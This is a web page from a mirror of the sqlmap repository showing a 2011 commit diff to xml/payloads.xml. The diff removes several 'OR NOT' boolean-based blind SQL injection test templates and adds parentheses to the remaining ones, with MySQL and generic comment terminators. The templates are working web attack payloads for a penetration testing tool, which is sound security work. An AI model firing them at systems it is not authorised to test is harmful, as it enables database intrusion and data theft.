sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-26 11:33:47 +03:00
Code Issues Packages Projects Releases Wiki Activity

parenthesis were missing; banning OR NOT from payloads

Browse Source
This commit is contained in:
Miroslav Stampar 2011-04-21 23:32:53 +00:00
parent 41924a6ead
commit 0764c4c752
1 changed files with 9 additions and 62 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

71
xml/payloads.xml
View File

@ -503,22 +503,6 @@ Formats:
</response> </response>
</test> </test>
<test>
<title>OR NOT boolean-based blind - WHERE or HAVING clause</title>
<stype>1</stype>
<level>2</level>
<risk>3</risk>
<clause>1</clause>
<where>2</where>
<vector>OR NOT [INFERENCE]</vector>
<request>
<payload>OR NOT [RANDNUM]=[RANDNUM]</payload>
</request>
<response>
<comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>
</response>
</test>
<test> <test>
<title>OR boolean-based blind - WHERE or HAVING clause</title> <title>OR boolean-based blind - WHERE or HAVING clause</title>
<stype>1</stype> <stype>1</stype>
@ -526,35 +510,15 @@ Formats:
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1</clause>
<where>2</where> <where>2</where>
<vector>OR [INFERENCE]</vector> <vector>OR NOT ([INFERENCE])</vector>
<request> <request>
<payload>OR [RANDNUM]=[RANDNUM]</payload> <payload>OR NOT ([RANDNUM]=[RANDNUM])</payload>
</request> </request>
<response> <response>
<comparison>OR [RANDNUM]=[RANDNUM1]</comparison> <comparison>OR NOT ([RANDNUM]=[RANDNUM1])</comparison>
</response> </response>
</test> </test>
<test>
<title>OR NOT boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
<stype>1</stype>
<level>3</level>
<risk>3</risk>
<clause>1</clause>
<where>2</where>
<vector>OR NOT [INFERENCE]</vector>
<request>
<payload>OR NOT [RANDNUM]=[RANDNUM]</payload>
<comment>#</comment>
</request>
<response>
<comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test> <test>
<title>OR boolean-based blind - WHERE or HAVING clause (MySQL comment)</title> <title>OR boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
<stype>1</stype> <stype>1</stype>
@ -562,36 +526,19 @@ Formats:
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1</clause>
<where>2</where> <where>2</where>
<vector>OR [INFERENCE]</vector> <vector>OR NOT ([INFERENCE])</vector>
<request> <request>
<payload>OR [RANDNUM]=[RANDNUM]</payload> <payload>OR NOT ([RANDNUM]=[RANDNUM])</payload>
<comment>#</comment> <comment>#</comment>
</request> </request>
<response> <response>
<comparison>OR [RANDNUM]=[RANDNUM1]</comparison> <comparison>OR NOT ([RANDNUM]=[RANDNUM1])</comparison>
</response> </response>
<details> <details>
<dbms>MySQL</dbms> <dbms>MySQL</dbms>
</details> </details>
</test> </test>
<test>
<title>OR NOT boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
<stype>1</stype>
<level>3</level>
<risk>3</risk>
<clause>1</clause>
<where>2</where>
<vector>OR NOT [INFERENCE]</vector>
<request>
<payload>OR NOT [RANDNUM]=[RANDNUM]</payload>
<comment>--</comment>
</request>
<response>
<comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>
</response>
</test>
<test> <test>
<title>OR boolean-based blind - WHERE or HAVING clause (Generic comment)</title> <title>OR boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
<stype>1</stype> <stype>1</stype>
@ -599,13 +546,13 @@ Formats:
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1</clause>
<where>2</where> <where>2</where>
<vector>OR [INFERENCE]</vector> <vector>OR NOT ([INFERENCE])</vector>
<request> <request>
<payload>OR [RANDNUM]=[RANDNUM]</payload> <payload>OR NOT ([RANDNUM]=[RANDNUM])</payload>
<comment>--</comment> <comment>--</comment>
</request> </request>
<response> <response>
<comparison>OR [RANDNUM]=[RANDNUM1]</comparison> <comparison>OR NOT ([RANDNUM]=[RANDNUM1])</comparison>
</response> </response>
</test> </test>